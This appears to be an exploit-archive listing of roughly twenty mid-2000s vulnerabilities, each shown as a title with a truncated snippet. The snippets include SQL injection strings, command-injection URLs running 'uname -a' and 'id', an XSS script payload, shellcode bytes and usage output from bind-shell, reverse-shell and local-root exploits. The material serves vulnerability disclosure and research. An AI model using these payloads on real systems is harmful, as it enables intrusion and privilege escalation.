Sql Injection in CJ Ultra Plus v1.0.3-1.0.4
ADVISORY Sql Injection in CJ Ultra Plus v1.0.3-1.0.4? "My God, it's full of stars" - c MwNN Vulnerable code is in out.php ---code begin-- ... if isset$perm $query = "select a1, a2 from trade where a1 = '$perm'"; -muhahaha $result = mysqlquery$query; if!$result errormessagesqlerror; ... ---code...
E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl Example added if code doesn't work for ya: http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductoresdvd&art=reproductordvp-ns315.dat|uname%20-a| /str0ke info: [email protected] use IO::Socket; print "\n\n www.badroot.org \n\n"; print...
GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)
/ cybertronicatgmxdotnet offset fixed! cybertronic @ GoodTech $ gcc -o goodtechexpl goodtechexpl.c cybertronic @ GoodTech $ ./goodtechexpl Usage ----- Bindshell ./goodtechexpl Reverseshell ./goodtechexpl cybertronic @ GoodTech $ ./goodtechexpl 192.168.2.103 / / / / / / / / / / / / / / / / / / /...
OneWorldStore - DisplayResults.asp SQL Injection
source: https://www.securityfocus.com/bid/13249/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful...
sash <= 3.7 Local Buffer Overflow Exploit
No description provided by source. / sash-3.7 buffer overflow in c argyment written by lammat for practice purposes http://grpower.ath.cx [email protected] gdb r -c perl -e 'print "A"x10256' The program being debugged has been started already. Start it from the beginning? y or n y Starting program...
MS Internet Explorer "mshtml.dll" CSS Parsing Buffer Overflow
No description provided by source. / Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will trigger the buffer overflow. /...
The Includer CGI <= 1.0 Remote Command Execution
Exploit for cgi platform in category web applications ================================================ The Includer CGI = 1.0 Remote Command Execution ================================================ Remote Command Execution on: Example I.: www.host-vulnerable.com/includer.cgi?|id| Example II.:...
formmail23.txt
-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: Form Mail Script FS Version: Location: Poland Email: groszynskif gmail com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --...
mixedSQL.txt
Postnuke all versions + pnphpbb =1.2 sql injection - jocanor Author: Jocanor Date: 01-03-2k5 1. -----------introduction--------. Postnuke is an open source CMS content management system, originally based in php-nuke. www.postnuke.com pnphpbb is a module for postnuke based in popular forum system...
osCommerceXSS.txt
Hello All, I have discovered XSS vulnerability in: osCommerce 2.2-MS2 Authors Site: http://www.oscommerce.com/ +-Example:--------------------------------------------------+ XSS: http://www.victimsite.com/contactus.php?&name=1&email=1&enquiry=%3C/textare a%3E%3Cscript%3Ealert'w00t';%3C/script%3E...
Plugins can be used to load privileged content — Mozilla
Plugins such as flash can be used to load privileged content into a frame. Once loaded various spoofs can be applied to get the user to interact with the privileged content. Michael Krax's "Fireflashing" example demonstrates that an attacker can open about:config in a frame, hide it with an opaci...
Typespeed 0.4.1 - Local Format String
// source: https://www.securityfocus.com/bid/12569/info typespeed is prone to a local format string vulnerability. Successful exploitation could allow privilege escalation. / Proof of Concept local exploit for typespeed tool "enva" content: include include int mainint argc, char argv char addrptr = NULL;...
[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities
Vulnerable Systems: ---------------- vBulletin version 3.0 up to and including version 3.0.4 Immune systems: ---------------- vBulletin version 3.0.5 vBulletin version 3.0.6 Vulnerable code in forumdisplay.php : if $vboptions'showforumusers' . . . . if $bbuserinfo'userid' . . . . $comma = ', ';...
MyPHP Forum 1.0 SQL Injection Exploit
No description provided by source. /==========================================/ // GHC - MyPHP Forum - ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /==========================================/ example of exploit...
MyPHP Forum 1.0 - SQL Injection
/==========================================/ // GHC - MyPHP Forum - ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /==========================================/ example of exploit...
Setuid perl PerlIO_Debug() overflow
Exploit for linux platform in category local exploits =================================== Setuid perl PerlIODebug overflow =================================== / Copyright Kevin Finisterre Setuid perl PerlIODebug overflow Tested on Debian 3.1 perl-suid 5.8.4-5 11:07:20 corezion: who is tha man wit...
trn-test.txt
/ /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com / / sh-2.05b$ ./trn usage : ./trn ret buf example : ./trn 0xbfffff64 + mandrake 9.2 = 0xbfffff96 + slackware 10.0.0= 0xbfffff98 + slackware 9.1.0= 0xbfffff84 sh-2.05b$ sh-2.05b$ ./trn 0xbfffff84 128 BOO % 128 RET % bfffff84...
IEurlflaw.txt
All, The following very simple! code calls a URL in the browser window but fails to update the address bar in IE. Looks like the form submission is suspended with the interrupt of the 'window.alert' call. IE then fails to correctly handle. Might be helpful in facilitating phishing style attacks...
AWStats 6.0 6.2 - configdir Remote Command Execution (C)
/ AwStats exploit by Thunder, [email protected] This exploit makes use of the remote command execution bug discovered in AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script. The script does not sanitise correctly the us...
Exim <= 4.41 dns_build_reverse Local Exploit PoC
Exploit for linux platform in category local exploits ================================================ Exim int main int argc, char argv static char shellcode= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"...